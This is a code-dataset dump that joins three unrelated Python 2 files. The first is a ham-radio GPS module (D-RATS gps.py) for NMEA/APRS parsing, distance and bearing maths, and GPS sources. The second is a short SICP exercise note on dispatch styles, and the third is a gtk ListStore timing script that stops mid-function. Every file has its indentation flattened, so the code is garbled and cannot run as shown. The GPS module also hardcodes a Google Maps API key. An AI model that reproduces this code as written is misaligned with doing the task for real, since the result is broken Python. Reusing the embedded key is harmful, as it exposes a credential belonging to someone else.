coddingtonbear/d-rats | d_rats/gps.py | 1 | 33132 | import re
import time
import tempfile
import platform
import datetime
import subst
import threading
import serial
import socket
from math import pi,cos,acos,sin,atan2
import utils
if __name__ == "__main__":
import gettext
gettext.install("D-RATS")
TEST = "$GPGGA,180718.02,4531.3740,N,12255.4599,W,1,07,1.4,50.6,M,-21.4,M,,*63 KE7JSS ,440.350+ PL127.3"
EARTH_RADIUS = 3963.1
EARTH_UNITS = "mi"
DEGREE = u"\u00b0"
DPRS_TO_APRS = {}
# The DPRS to APRS mapping is pretty horrific, but the following
# attempts to create a mapping based on looking at the javascript
# for DPRSCalc and a list of regular APRS symbols
#
# http://ham-shack.com/aprs_pri_symbols.html
# http://www.aprs-is.net/DPRSCalc.aspx
for i in range(0, 26):
asciival = ord("A") + i
char = chr(asciival)
pri = "/"
sec = "\\"
DPRS_TO_APRS["P%s" % char] = pri + char
DPRS_TO_APRS["L%s" % char] = pri + char.lower()
DPRS_TO_APRS["A%s" % char] = sec + char
DPRS_TO_APRS["S%s" % char] = sec + char.lower()
if i <= 15:
pchar = chr(ord(" ") + i)
DPRS_TO_APRS["B%s" % char] = pri + pchar
DPRS_TO_APRS["O%s" % char] = sec + pchar
elif i >= 17:
pchar = chr(ord(" ") + i + 9)
DPRS_TO_APRS["M%s" % char] = pri + pchar
DPRS_TO_APRS["N%s" % char] = sec + pchar
if i <= 5:
char = chr(ord("S") + i)
pchar = chr(ord("[") + i)
DPRS_TO_APRS["H%s" % char] = pri + pchar
DPRS_TO_APRS["D%s" % char] = sec + pchar
#for k in sorted(DPRS_TO_APRS.keys()):
# print "%s => %s" % (k, DPRS_TO_APRS[k])
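# Illustrative entries produced by the loops above (i == 0, char 'A'):
#   DPRS_TO_APRS["PA"] == "/A", DPRS_TO_APRS["LA"] == "/a",
#   DPRS_TO_APRS["AA"] == "\A", DPRS_TO_APRS["SA"] == "\a"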
APRS_TO_DPRS = {}
for k,v in DPRS_TO_APRS.items():
APRS_TO_DPRS[v] = k
def dprs_to_aprs(symbol):
if len(symbol) < 2:
print "Invalid DPRS symbol: `%s'" % symbol
return None
else:
return DPRS_TO_APRS.get(symbol[0:2], None)
def parse_dms(string):
string = string.replace(u"\u00b0", " ")
string = string.replace('"', ' ')
string = string.replace("'", ' ')
string = string.replace(' ', ' ')
string = string.strip()
try:
(d, m, s) = string.split(' ', 3)
deg = int(d)
min = int(m)
sec = float(s)
except Exception, e:
deg = min = sec = 0
if deg < 0:
mul = -1
else:
mul = 1
deg = abs(deg)
return (deg + (min / 60.0) + (sec / 3600.0)) * mul
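# Example (illustrative): parse_dms("45 30 0") -> 45.5 (45 deg + 30/60 min + 0 sec)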
def set_units(units):
global EARTH_RADIUS
global EARTH_UNITS
if units == _("Imperial"):
EARTH_RADIUS = 3963.1
EARTH_UNITS = "mi"
elif units == _("Metric"):
EARTH_RADIUS = 6380.0
EARTH_UNITS = "km"
print "Set GPS units to %s" % units
def value_with_units(value):
if value < 0.5:
if EARTH_UNITS == "km":
scale = 1000
units = "m"
elif EARTH_UNITS == "mi":
scale = 5280
units = "ft"
else:
scale = 1
units = EARTH_UNITS
else:
scale = 1
units = EARTH_UNITS
return "%.2f %s" % (value * scale, units)
def NMEA_checksum(string):
checksum = 0
for i in string:
checksum ^= ord(i)
return "*%02x" % checksum
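# The NMEA checksum is the XOR of every character between '$' and '*'; callers
# pass that payload here and get back e.g. "*63" (two lower-case hex digits),
# matching the trailer of the TEST sentence above.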
def GPSA_checksum(string):
def calc(buf):
icomcrc = 0xffff
for _char in buf:
char = ord(_char)
for i in range(0, 8):
xorflag = (((icomcrc ^ char) & 0x01) == 0x01)
icomcrc = (icomcrc >> 1) & 0x7fff
if xorflag:
icomcrc ^= 0x8408
char = (char >> 1) & 0x7f
return (~icomcrc) & 0xffff
return calc(string)
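# Descriptive note: calc() above is a bit-reflected CRC-16 (polynomial 0x8408,
# the reversed form of 0x1021) seeded with 0xffff and inverted at the end --
# the same family as X.25/Kermit-style CRCs.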
def DPRS_checksum(callsign, msg):
csum = 0
string = "%-8s,%s" % (callsign, msg)
for i in string:
csum ^= ord(i)
return "*%02X" % csum
def deg2rad(deg):
return deg * (pi / 180)
def rad2deg(rad):
return rad / (pi / 180)
def dm2deg(deg, min):
return deg + (min / 60.0)
def deg2dm(decdeg):
deg = int(decdeg)
min = (decdeg - deg) * 60.0
return deg, min
def nmea2deg(nmea, dir="N"):
deg = int(nmea) / 100
try:
min = nmea % (deg * 100)
except ZeroDivisionError, e:
min = int(nmea)
if dir == "S" or dir == "W":
m = -1
else:
m = 1
return dm2deg(deg, min) * m
def deg2nmea(deg):
deg, min = deg2dm(deg)
return (deg * 100) + min
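# Worked example (illustrative): nmea2deg(4531.374, "N") reads ddmm.mmmm, i.e.
# 45 degrees + 31.374/60 ~= 45.5229; deg2nmea(45.5229) packs it back (~4531.374).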
def meters2feet(meters):
return meters * 3.2808399
def feet2meters(feet):
return feet * 0.3048
def distance(lat_a, lon_a, lat_b, lon_b):
lat_a = deg2rad(lat_a)
lon_a = deg2rad(lon_a)
lat_b = deg2rad(lat_b)
lon_b = deg2rad(lon_b)
earth_radius = EARTH_RADIUS
#print "cos(La)=%f cos(la)=%f" % (cos(lat_a), cos(lon_a))
#print "cos(Lb)=%f cos(lb)=%f" % (cos(lat_b), cos(lon_b))
#print "sin(la)=%f" % sin(lon_a)
#print "sin(lb)=%f" % sin(lon_b)
#print "sin(La)=%f sin(Lb)=%f" % (sin(lat_a), sin(lat_b))
#print "cos(lat_a) * cos(lon_a) * cos(lat_b) * cos(lon_b) = %f" % (\
# cos(lat_a) * cos(lon_a) * cos(lat_b) * cos(lon_b))
#print "cos(lat_a) * sin(lon_a) * cos(lat_b) * sin(lon_b) = %f" % (\
# cos(lat_a) * sin(lon_a) * cos(lat_b) * sin(lon_b))
#print "sin(lat_a) * sin(lat_b) = %f" % (sin(lat_a) * sin(lat_b))
tmp = (cos(lat_a) * cos(lon_a) * \
cos(lat_b) * cos(lon_b)) + \
(cos(lat_a) * sin(lon_a) * \
cos(lat_b) * sin(lon_b)) + \
(sin(lat_a) * sin(lat_b))
# Correct round-off error (which is just *silly*)
if tmp > 1:
tmp = 1
elif tmp < -1:
tmp = -1
distance = acos(tmp)
return distance * earth_radius
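# distance() above is the spherical law of cosines,
#   d = R * acos(sin(lat_a)*sin(lat_b) + cos(lat_a)*cos(lat_b)*cos(lon_a - lon_b)),
# written with cos(lon_a - lon_b) expanded; tmp is clamped to [-1, 1] so that
# round-off error cannot push it outside acos()'s domain.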
def parse_date(string, fmt):
try:
return datetime.datetime.strptime(string, fmt)
except AttributeError, e:
print "Enabling strptime() workaround for Python <= 2.4.x"
vals = {}
for c in "mdyHMS":
i = fmt.index(c)
vals[c] = int(string[i-1:i+1])
if len(vals.keys()) != (len(fmt) / 2):
raise Exception("Not all date bits converted")
return datetime.datetime(vals["y"] + 2000,
vals["m"],
vals["d"],
vals["H"],
vals["M"],
vals["S"])
class GPSPosition(object):
"""Represents a position on the globe, either from GPS data or a static
positition"""
def _from_coords(self, lat, lon, alt=0):
try:
self.latitude = float(lat)
except ValueError:
self.latitude = parse_dms(lat)
try:
self.longitude = float(lon)
except ValueError:
self.longitude = parse_dms(lon)
self.altitude = float(alt)
self.satellites = 3
self.valid = True
def _parse_dprs_comment(self):
symbol = self.comment[0:4].strip()
astidx = self.comment.rindex("*")
checksum = self.comment[astidx:]
_checksum = DPRS_checksum(self.station, self.comment[:astidx])
if int(_checksum[1:], 16) != int(checksum[1:], 16):
print "CHECKSUM(%s): %s != %s" % (self.station,
int(_checksum[1:], 16),
int(checksum[1:], 16))
#print "Failed to parse DPRS comment:"
#print " Comment: |%s|" % self.comment
#print " Check: %s %s (%i)" % (checksum, _checksum, astidx)
raise Exception("DPRS checksum failed")
self.APRSIcon = dprs_to_aprs(symbol)
self.comment = self.comment[4:astidx].strip()
def __init__(self, lat=0, lon=0, station="UNKNOWN"):
self.valid = False
self.altitude = 0
self.satellites = 0
self.station = station
self.comment = ""
self.current = None
self.date = datetime.datetime.now()
self.speed = None
self.direction = None
self.APRSIcon = None
self._original_comment = ""
self._from_coords(lat, lon)
def __iadd__(self, update):
self.station = update.station
if not update.valid:
return self
if update.satellites:
self.satellites = update.satellites
if update.altitude:
self.altitude = update.altitude
self.latitude = update.latitude
self.longitude = update.longitude
self.date = update.date
if update.speed:
self.speed = update.speed
if update.direction:
self.direction = update.direction
if update.comment:
self.comment = update.comment
self._original_comment = update._original_comment
if update.APRSIcon:
self.APRSIcon = update.APRSIcon
return self
def __str__(self):
if self.valid:
if self.current:
dist = self.distance_from(self.current)
bear = self.current.bearing_to(self)
distance = " - %.1f %s " % (dist, EARTH_UNITS) + \
_("away") + \
" @ %.1f " % bear + \
_("degrees")
else:
distance = ""
if self.comment:
comment = " (%s)" % self.comment
else:
comment = ""
if self.speed and self.direction:
if EARTH_UNITS == "mi":
speed = "%.1f mph" % (float(self.speed) * 1.15077945)
elif EARTH_UNITS == "m":
speed = "%.1f km/h" % (float(self.speed) * 1.852)
else:
speed = "%.2f knots" % float(self.speed)
dir = " (" + _("Heading") +" %.0f at %s)" % (self.direction,
speed)
else:
dir = ""
if EARTH_UNITS == "mi":
alt = "%i ft" % meters2feet(self.altitude)
else:
alt = "%i m" % self.altitude
return "%s " % self.station + \
_("reporting") + \
" %.4f,%.4f@%s at %s%s%s%s" % ( \
self.latitude,
self.longitude,
alt,
self.date.strftime("%H:%M:%S"),
subst.subst_string(comment),
distance,
dir)
else:
return "(" + _("Invalid GPS data") + ")"
def _NMEA_format(self, val, latitude):
if latitude:
if val > 0:
d = "N"
else:
d = "S"
else:
if val > 0:
d = "E"
else:
d = "W"
return "%.3f,%s" % (deg2nmea(abs(val)), d)
def station_format(self):
if " " in self.station:
call, extra = self.station.split(" ", 1)
sta = "%-7.7s%1.1s" % (call.strip(),
extra.strip())
else:
sta = self.station
return sta
def to_NMEA_GGA(self, ssid=" "):
"""Returns an NMEA-compliant GPGGA sentence"""
date = time.strftime("%H%M%S")
lat = self._NMEA_format(self.latitude, True)
lon = self._NMEA_format(self.longitude, False)
data = "GPGGA,%s,%s,%s,1,%i,0,%i,M,0,M,," % ( \
date,
lat,
lon,
self.satellites,
self.altitude)
sta = self.station_format()
# If we had an original comment (with some encoding), use that instead
if self._original_comment:
com = self._original_comment
else:
com = self.comment
return "$%s%s\r\n%-8.8s,%-20.20s\r\n" % (data,
NMEA_checksum(data),
sta,
com)
def to_NMEA_RMC(self):
"""Returns an NMEA-compliant GPRMC sentence"""
tstamp = time.strftime("%H%M%S")
dstamp = time.strftime("%d%m%y")
lat = self._NMEA_format(self.latitude, True)
lon = self._NMEA_format(self.longitude, False)
if self.speed:
speed = "%03.1f" % self.speed
else:
speed = "000.0"
if self.direction:
dir = "%03.1f" % self.direction
else:
dir = "000.0"
data = "GPRMC,%s,A,%s,%s,%s,%s,%s,000.0,W" % ( \
tstamp,
lat,
lon,
speed,
dir,
dstamp)
sta = self.station_format()
return "$%s%s\r\n%-8.8s,%-20.20s\r\n" % (data,
NMEA_checksum(data),
sta,
self.comment)
def to_APRS(self, dest="APRATS", symtab="/", symbol=">"):
"""Returns a GPS-A (APRS-compliant) string"""
stamp = time.strftime("%H%M%S", time.gmtime())
if " " in self.station:
sta = self.station.replace(" ", "-")
else:
sta = self.station
s = "%s>%s,DSTAR*:/%sh" % (sta, dest, stamp)
if self.latitude > 0:
ns = "N"
Lm = 1
else:
ns = "S"
Lm = -1
if self.longitude > 0:
ew = "E"
lm = 1
else:
ew = "W"
lm = -1
s += "%07.2f%s%s%08.2f%s%s" % (deg2nmea(self.latitude * Lm), ns,
symtab,
deg2nmea(self.longitude * lm), ew,
symbol)
if self.speed and self.direction:
s += "%03.0f/%03.0f" % (float(self.direction), float(self.speed))
if self.altitude:
s += "/A=%06i" % meters2feet(float(self.altitude))
else:
s += "/"
if self.comment:
l = 43
if self.altitude:
l -= len("/A=xxxxxx")
s += "%s" % self.comment[:l]
s += "\r"
return "$$CRC%04X,%s\n" % (GPSA_checksum(s), s)
def set_station(self, station, comment="D-RATS"):
self.station = station
self.comment = comment
self._original_comment = comment
if len(self.comment) >=7 and "*" in self.comment[-3:-1]:
self._parse_dprs_comment()
def distance_from(self, pos):
return distance(self.latitude, self.longitude,
pos.latitude, pos.longitude)
def bearing_to(self, pos):
lat_me = deg2rad(self.latitude)
lon_me = deg2rad(self.longitude)
lat_u = deg2rad(pos.latitude)
lon_u = deg2rad(pos.longitude)
lat_d = deg2rad(pos.latitude - self.latitude)
lon_d = deg2rad(pos.longitude - self.longitude)
y = sin(lon_d) * cos(lat_u)
x = cos(lat_me) * sin(lat_u) - \
sin(lat_me) * cos(lat_u) * cos(lon_d)
bearing = rad2deg(atan2(y, x))
return (bearing + 360) % 360
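    # bearing_to() above is the standard forward-azimuth formula,
    #   theta = atan2(sin(dlon)*cos(lat2), cos(lat1)*sin(lat2) - sin(lat1)*cos(lat2)*cos(dlon)),
    # normalised into [0, 360) degrees.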
def set_relative_to_current(self, current):
self.current = current
def coordinates(self):
return "%.4f,%.4f" % (self.latitude, self.longitude)
def fuzzy_to(self, pos):
dir = self.bearing_to(pos)
dirs = ["N", "NNE", "NE", "ENE", "E",
"ESE", "SE", "SSE", "S",
"SSW", "SW", "WSW", "W",
"WNW", "NW", "NNW"]
delta = 22.5
angle = 0
direction = "?"
for i in dirs:
if dir > angle and dir < (angle + delta):
direction = i
angle += delta
return "%.1f %s %s" % (self.distance_from(pos),
EARTH_UNITS,
direction)
class NMEAGPSPosition(GPSPosition):
"""A GPSPosition initialized from a NMEA sentence"""
def _test_checksum(self, string, csum):
try:
idx = string.index("*")
except:
print "String does not contain '*XY' checksum"
return False
segment = string[1:idx]
csum = csum.upper()
_csum = NMEA_checksum(segment).upper()
if csum != _csum:
print "Failed checksum: %s != %s" % (csum, _csum)
return csum == _csum
def _parse_GPGGA(self, string):
elements = string.split(",", 14)
if len(elements) < 15:
raise Exception("Unable to split GPGGA" % len(elements))
t = time.strftime("%m%d%y") + elements[1]
if "." in t:
t = t.split(".")[0]
self.date = parse_date(t, "%m%d%y%H%M%S")
self.latitude = nmea2deg(float(elements[2]), elements[3])
self.longitude = nmea2deg(float(elements[4]), elements[5])
print "%f,%f" % (self.latitude, self.longitude)
self.satellites = int(elements[7])
self.altitude = float(elements[9])
        m = re.match("^([0-9]*)(\*[A-Za-z0-9]{2})\r?\n?(.*)$", elements[14])
if not m:
raise Exception("No checksum (%s)" % elements[14])
csum = m.group(2)
if "," in m.group(3):
sta, com = m.group(3).split(",", 1)
if not sta.strip().startswith("$"):
self.station = utils.filter_to_ascii(sta.strip()[0:8])
self.comment = utils.filter_to_ascii(com.strip()[0:20])
self._original_comment = self.comment
if len(self.comment) >=7 and "*" in self.comment[-3:-1]:
self._parse_dprs_comment()
self.valid = self._test_checksum(string, csum)
def _parse_GPRMC(self, string):
if "\r\n" in string:
nmea, station = string.split("\r\n", 1)
else:
nmea = string
station = ""
elements = nmea.split(",", 12)
if len(elements) < 12:
raise Exception("Unable to split GPRMC (%i)" % len(elements))
t = elements[1]
d = elements[9]
if "." in t:
t = t.split(".", 2)[0]
self.date = parse_date(d+t, "%d%m%y%H%M%S")
self.latitude = nmea2deg(float(elements[3]), elements[4])
self.longitude = nmea2deg(float(elements[5]), elements[6])
self.speed = float(elements[7])
self.direction = float(elements[8])
if "*" in elements[11]:
end = 11 # NMEA <=2.0
elif "*" in elements[12]:
end = 12 # NMEA 2.3
else:
raise Exception("GPRMC has no checksum in 12 or 13")
        m = re.match("^.?(\*[A-Za-z0-9]{2})", elements[end])
if not m:
print "Invalid end: %s" % elements[end]
return
csum = m.group(1)
if "," in station:
sta, com = station.split(",", 1)
self.station = utils.filter_to_ascii(sta.strip())
self.comment = utils.filter_to_ascii(com.strip())
self._original_comment = self.comment
if len(self.comment) >= 7 and "*" in self.comment[-3:-1]:
self._parse_dprs_comment()
if elements[2] != "A":
self.valid = False
print "GPRMC marked invalid by GPS (%s)" % elements[2]
else:
print "GPRMC is valid"
self.valid = self._test_checksum(string, csum)
def _from_NMEA_GPGGA(self, string):
string = string.replace('\r', ' ')
string = string.replace('\n', ' ')
try:
self._parse_GPGGA(string)
except Exception, e:
import traceback
import sys
traceback.print_exc(file=sys.stdout)
print "Invalid GPS data: %s" % e
self.valid = False
def _from_NMEA_GPRMC(self, string):
try:
self._parse_GPRMC(string)
except Exception, e:
import traceback
import sys
traceback.print_exc(file=sys.stdout)
print "Invalid GPS data: %s" % e
self.valid = False
def __init__(self, sentence, station=_("UNKNOWN")):
GPSPosition.__init__(self)
if sentence.startswith("$GPGGA"):
self._from_NMEA_GPGGA(sentence)
elif sentence.startswith("$GPRMC"):
self._from_NMEA_GPRMC(sentence)
else:
print "Unsupported GPS sentence type: %s" % sentence
class APRSGPSPosition(GPSPosition):
def _parse_date(self, string):
prefix = string[0]
suffix = string[-1]
digits = string[1:-1]
if suffix == "z":
ds = digits[0:2] + \
time.strftime("%m%y", time.gmtime()) + \
digits[2:] + "00"
elif suffix == "/":
ds = digits[0:2] + time.strftime("%m%y") + digits[2:] + "00"
elif suffix == "h":
ds = time.strftime("%d%m%y", time.gmtime()) + digits
else:
print "Unknown APRS date suffix: `%s'" % suffix
return datetime.datetime.now()
d = parse_date(ds, "%d%m%y%H%M%S")
if suffix in "zh":
delta = datetime.datetime.utcnow() - datetime.datetime.now()
else:
delta = datetime.timedelta(0)
return d - delta
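    # Example (illustrative): an APRS stamp "092345z" means day-of-month 09 at
    # 23:45 UTC; the suffix selects zulu (z), local (/) or hhmmss (h) handling
    # in _parse_date() above.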
def _parse_GPSA(self, string):
m = re.match("^\$\$CRC([A-Z0-9]{4}),(.*)$", string)
if not m:
return
crc = m.group(1)
_crc = "%04X" % GPSA_checksum(m.group(2))
if crc != _crc:
print "APRS CRC mismatch: %s != %s (%s)" % (crc, _crc, m.group(2))
return
elements = string.split(",")
if not elements[0].startswith("$$CRC"):
print "Missing $$CRC..."
return
self.station, dst = elements[1].split(">")
path, data = elements[2].split(":")
# 1 = Entire stamp or ! or =
# 2 = stamp prefix
# 3 = stamp suffix
# 4 = latitude
# 5 = N/S
# 6 = symbol table
# 7 = longitude
# 8 = E/W
# 9 = symbol
#10 = comment
#11 = altitude string
expr = "^(([@/])[0-9]{6}([/hz])|!|=)" + \
"([0-9]{1,4}\.[0-9]{2})([NS])(.)?" + \
"([0-9]{5}\.[0-9]{2})([EW])(.)" + \
"([^/]*)(/A=[0-9]{6})?"
m = re.search(expr, data)
if not m:
print "Did not match GPS-A: `%s'" % data
return
if m.group(1) in "!=":
self.date = datetime.datetime.now()
elif m.group(2) in "@/":
self.date = self._parse_date(m.group(1))
else:
print "Unknown timestamp prefix: %s" % m.group(1)
self.date = datetime.datetime.now()
self.latitude = nmea2deg(float(m.group(4)), m.group(5))
self.longitude = nmea2deg(float(m.group(7)), m.group(8))
self.comment = m.group(10).strip()
self._original_comment = self.comment
self.APRSIcon = m.group(6) + m.group(9)
if len(m.groups()) == 11 and m.group(11):
_, alt = m.group(11).split("=")
self.altitude = feet2meters(int(alt))
self.valid = True
def _from_APRS(self, string):
self.valid = False
try:
self._parse_GPSA(string)
except Exception, e:
print "Invalid APRS: %s" % e
return False
return self.valid
def __init__(self, message):
GPSPosition.__init__(self)
self._from_APRS(message)
class MapImage(object):
def __init__(self, center):
self.key = "ABQIAAAAWot3KuWpenfCAGfQ65FdzRTaP0xjRaMPpcw6bBbU2QUEXQBgHBR5Rr2HTGXYVWkcBFNkPvxtqV4VLg"
self.center = center
self.markers = [center]
def add_markers(self, markers):
self.markers += markers
def get_image_url(self):
el = [ "key=%s" % self.key,
"center=%s" % self.center.coordinates(),
"size=400x400"]
mstr = "markers="
index = ord("a")
for m in self.markers:
mstr += "%s,blue%s|" % (m.coordinates(), chr(index))
index += 1
el.append(mstr)
return "http://maps.google.com/staticmap?%s" % ("&".join(el))
def station_table(self):
table = ""
index = ord('A')
for m in self.markers:
table += "<tr><td>%s</td><td>%s</td><td>%s</td>\n" % (\
chr(index),
m.station,
m.coordinates())
index += 1
return table
def make_html(self):
return """
<html>
<head>
<title>Known stations</title>
</head>
<body>
<h1> Known Stations </h1>
<img src="%s"/><br/><br/>
<table border="1">
%s
</table>
</body>
</html>
""" % (self.get_image_url(), self.station_table())
def display_in_browser(self):
f = tempfile.NamedTemporaryFile(suffix=".html")
name = f.name
f.close()
f = file(name, "w")
f.write(self.make_html())
f.flush()
f.close()
p = platform.get_platform()
p.open_html_file(f.name)
class GPSSource(object):
def __init__(self, port, rate=4800):
self.port = port
self.enabled = False
self.broken = None
try:
self.serial = serial.Serial(port=port, baudrate=rate, timeout=1)
except Exception, e:
print "Unable to open port `%s': %s" % (port, e)
self.broken = _("Unable to open GPS port")
self.thread = None
self.last_valid = False
self.position = GPSPosition()
def start(self):
if self.broken:
print "Not starting broken GPSSource"
return
self.invalid = 100
self.enabled = True
self.thread = threading.Thread(target=self.gpsthread)
self.thread.setDaemon(True)
self.thread.start()
def stop(self):
if self.thread and self.enabled:
self.enabled = False
self.thread.join()
self.serial.close()
def gpsthread(self):
while self.enabled:
data = self.serial.read(1024)
lines = data.split("\r\n")
for line in lines:
if line.startswith("$GPGGA") or \
line.startswith("$GPRMC"):
position = NMEAGPSPosition(line)
if position.valid and line.startswith("$GPRMC"):
self.invalid = 0
elif self.invalid < 10:
self.invalid += 1
if position.valid and self.position.valid:
self.position += position
print _("ME") + ": %s" % self.position
elif position.valid:
self.position = position
else:
print "Could not parse: %s" % line
def get_position(self):
return self.position
def status_string(self):
if self.broken:
return self.broken
elif self.invalid < 10 and self.position.satellites >= 3:
return _("GPS Locked") + " (%i sats)" % self.position.satellites
else:
return _("GPS Not Locked")
class NetworkGPSSource(GPSSource):
def __init__(self, port):
self.port = port
self.enabled = False
self.thread = None
self.position = GPSPosition()
self.last_valid = False
self.sock = None
self.broken = None
def start(self):
self.enabled = True
self.thread = threading.Thread(target=self.gpsthread)
self.thread.setDaemon(True)
self.thread.start()
def stop(self):
if self.thread and self.enabled:
self.enabled = False
self.thread.join()
def connect(self):
try:
_, host, port = self.port.split(":", 3)
port = int(port)
except ValueError, e:
print "Unable to parse %s (%s)" % (self.port, e)
self.broken = _("Unable to parse address")
return False
print "Connecting to %s:%i" % (host, port)
try:
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.connect((host, port))
self.sock.settimeout(10)
except Exception, e:
print "Unable to connect: %s" % e
self.broken = _("Unable to connect") + ": %s" % e
self.sock = None
return False
self.sock.send("r\n")
return True
def gpsthread(self):
while self.enabled:
if not self.sock:
if not self.connect():
time.sleep(1)
continue
try:
data = self.sock.recv(1024)
except Exception, e:
self.sock.close()
self.sock = None
print _("GPSd Socket closed")
continue
line = data.strip()
if not (line.startswith("$GPGGA") or \
line.startswith("$GPRMC")):
continue
pos = NMEAGPSPosition(line)
self.last_valid = pos.valid
if pos.valid and self.position.valid:
self.position += pos
elif pos.valid:
self.position = pos
else:
print "Could not parse: %s" % line
def get_position(self):
return self.position
def status_string(self):
if self.broken:
return self.broken
elif self.last_valid and self.position.satellites >= 3:
return _("GPSd Locked") + " (%i sats)" % self.position.satellites
else:
return _("GPSd Not Locked")
class StaticGPSSource(GPSSource):
def __init__(self, lat, lon, alt=0):
self.lat = lat
self.lon = lon
self.alt = alt
self.position = GPSPosition(self.lat, self.lon)
self.position.altitude = int(float(alt))
if EARTH_UNITS == "mi":
# This is kinda ugly, but assume we're given altitude in the same
# type of units as we've been asked to display
self.position.altitude = feet2meters(self.position.altitude)
def start(self):
pass
def stop(self):
pass
def get_position(self):
return self.position
def status_string(self):
return _("Static position")
def parse_GPS(string):
fixes = []
while "$" in string:
try:
if "$GPGGA" in string:
fixes.append(NMEAGPSPosition(string[string.index("$GPGGA"):]))
string = string[string.index("$GPGGA")+6:]
elif "$GPRMC" in string:
fixes.append(NMEAGPSPosition(string[string.index("$GPRMC"):]))
string = string[string.index("$GPRMC")+6:]
elif "$$CRC" in string:
return APRSGPSPosition(string[string.index("$$CRC"):])
else:
string = string[string.index("$")+1:]
except Exception, e:
print "Exception during GPS parse: %s" % e
string = string[string.index("$")+1:]
if not fixes:
return None
fix = fixes[0]
fixes = fixes[1:]
for extra in fixes:
print "Appending fix: %s" % extra
fix += extra
return fix
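# Example (illustrative): parse_GPS(TEST) picks the $GPGGA sentence defined at
# the top of this module out of the string and returns a fix whose station is
# "KE7JSS".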
if __name__ == "__main__":
nmea_strings = [
"$GPRMC,010922,A,4603.6695,N,07307.3033,W,0.6,66.8,060508,16.1,W,A*1D\r\nVE2SE 9,MV [email protected]*32",
"$GPGGA,203008.78,4524.9729,N,12246.9580,W,1,03,3.8,00133,M,,,,*39",
"$GPGGA,183324.518,4533.0875,N,12254.5939,W,2,04,3.4,48.6,M,-19.6,M,1.2,0000*74",
"$GPRMC,215348,A,4529.3672,N,12253.2060,W,0.0,353.8,030508,17.5,E,D*3C",
"$GPGGA,075519,4531.254,N,12259.400,W,1,3,0,0.0,M,0,M,,*55\r\nK7HIO ,GPS Info",
"$GPRMC,074919.04,A,4524.9698,N,12246.9520,W,00.0,000.0,260508,19.,E*79",
"$GPRMC,123449.089,A,3405.1123,N,08436.4301,W,000.0,000.0,021208,,,A*71",
"$GPRMC,123449.089,A,3405.1123,N,08436.4301,W,000.0,000.0,021208,,,A*71\r\nKK7DS M,LJ DAN*C",
"$GPRMC,230710,A,2748.1414,N,08238.5556,W,000.0,033.1,111208,004.3,W*77",
]
print "-- NMEA --"
for s in nmea_strings:
p = NMEAGPSPosition(s)
if p.valid:
print "Pass: %s" % str(p)
else:
print "** FAIL: %s" % s
aprs_strings = [
"$$CRCCE3E,AE5PL-T>API282,DSTAR*:!3302.39N/09644.66W>/\r",
"$$CRC1F72,KI4IFW-1>APRATS,DSTAR*:@291930/4531.50N/12254.98W>APRS test beacon /A=000022",
"$$CRC80C3,VA2PBI>APU25N,DSTAR*:=4539.33N/07330.28W-73 de Pierre D-Star Montreal {UIV32N}",
"$$CRCA31F,VA2PBI>API282,DSTAR*:/221812z4526.56N07302.34W/\r",
'$$CRCF471,AB9FT-ML>APRATS,DSTAR*:@214235h0.00S/00000.00W>ON D-RATS at Work\r',
]
print "\n-- GPS-A --"
for s in aprs_strings:
p = APRSGPSPosition(s)
if p.valid:
print "Pass: %s" % str(p)
else:
print "** FAIL: %s" % s
| gpl-3.0 | 4,689,796,423,073,490,000 | 28.063158 | 111 | 0.489165 | false |
aoyono/sicpy | Chapter2/exercises/exercise2_76.py | 1 | 1059 | # -*- coding: utf-8 -*-
"""
https://mitpress.mit.edu/sicp/full-text/book/book-Z-H-16.html#%_thm_2.76
"""
def run_the_magic():
print("""
In case we add new types to a system with generic operations:
1. in explicit design style, we would need to create a new predicate
for each type, a new constructor and modify the generic operators
2. in data-directed design style, we would need to modify an install
procedure
    3. in message-passing design style, we would only need to write a new
    constructor that carries its own internal dispatch procedure
In case we add new operators:
1. in explicit: modify almost everything
2. in data-directed: modify the install package
    3. in message-passing: modify the dispatch procedure inside every
    constructor
    Data-directed and message-passing are better when we must often add types.
    Explicit dispatch is better when we must often add operations.
""")
if __name__ == "__main__":
run_the_magic()
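# A minimal Python sketch (illustrative, not part of the original exercise) of
# the message-passing style discussed in run_the_magic() above: the constructor
# returns a dispatch procedure, so a new type is just one new constructor,
# while a new operation means touching every constructor's dispatch.
def make_rectangular(x, y):
    def dispatch(op):
        if op == 'real-part':
            return x
        elif op == 'imag-part':
            return y
        else:
            raise ValueError('unknown operation: {0}'.format(op))
    return dispatch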
| mit | -4,016,245,937,390,531,000 | 35.517241 | 80 | 0.621341 | false |
timlau/yumex | src/poc/test-liststore.py | 1 | 2777 | #!/usr/bin/python -tt
import gtk
import time
import gobject
import base64
class Dummy:
def __init__(self):
self.name = 'package'
self.ver = '1.0'
self.rel = '0.1.fc14'
self.arch = 'x86_64'
self.summary = "This is a packages"
def list_store(model, num=10):
for i in xrange(num):
print model[i][1]
def test_store1():
print "Unsorted ListStore"
start = time.time()
d = Dummy()
store = gtk.ListStore(gobject.TYPE_PYOBJECT, str, str, str, str, str, long)
#store = gtk.ListStore(gobject.TYPE_PYOBJECT, str)
for i in xrange(20000):
store.append([d, "%s" % base64.b64encode(str(i)), "Some text", "Some text", "Some text", "Some text", 1000L])
#store.append([d, d.name])
end = time.time()
print ("test_store1 time : %.2f " % (end - start))
list_store(store)
def test_store2():
print "TreeModelSort (set_sort_column_id(1, gtk.SORT_ASCENDING) before population)"
start = time.time()
d = Dummy()
store = gtk.ListStore(gobject.TYPE_PYOBJECT, str, str, str, str, str, long)
sort_store = gtk.TreeModelSort(store)
sort_store.set_sort_column_id(1, gtk.SORT_ASCENDING)
for i in xrange(20000):
store.append([d, "%s" % base64.b64encode(str(i)), "Some text", "Some text", "Some text", "Some text", 1000L])
end = time.time()
print ("test_store2 time : %.2f " % (end - start))
list_store(sort_store)
def test_store3():
print "TreeModelSort (set_sort_column_id(1, gtk.SORT_ASCENDING) after population)"
start = time.time()
d = Dummy()
store = gtk.ListStore(gobject.TYPE_PYOBJECT, str, str, str, str, str, long)
sort_store = gtk.TreeModelSort(store)
#sort_store.set_default_sort_func(lambda *args: -1)
for i in xrange(20000):
store.append([d, "%s" % base64.b64encode(str(i)), "Some text", "Some text", "Some text", "Some text", 1000L])
sort_store.set_sort_column_id(1, gtk.SORT_ASCENDING)
end = time.time()
print ("test_store3 time : %.2f " % (end - start))
list_store(sort_store)
def test_store4():
start = time.time()
d = Dummy()
store = gtk.ListStore(gobject.TYPE_PYOBJECT, str, str, str, str, str, long)
sort_store = gtk.TreeModelSort(store)
#sort_store.set_default_sort_func(lambda *args: -1)
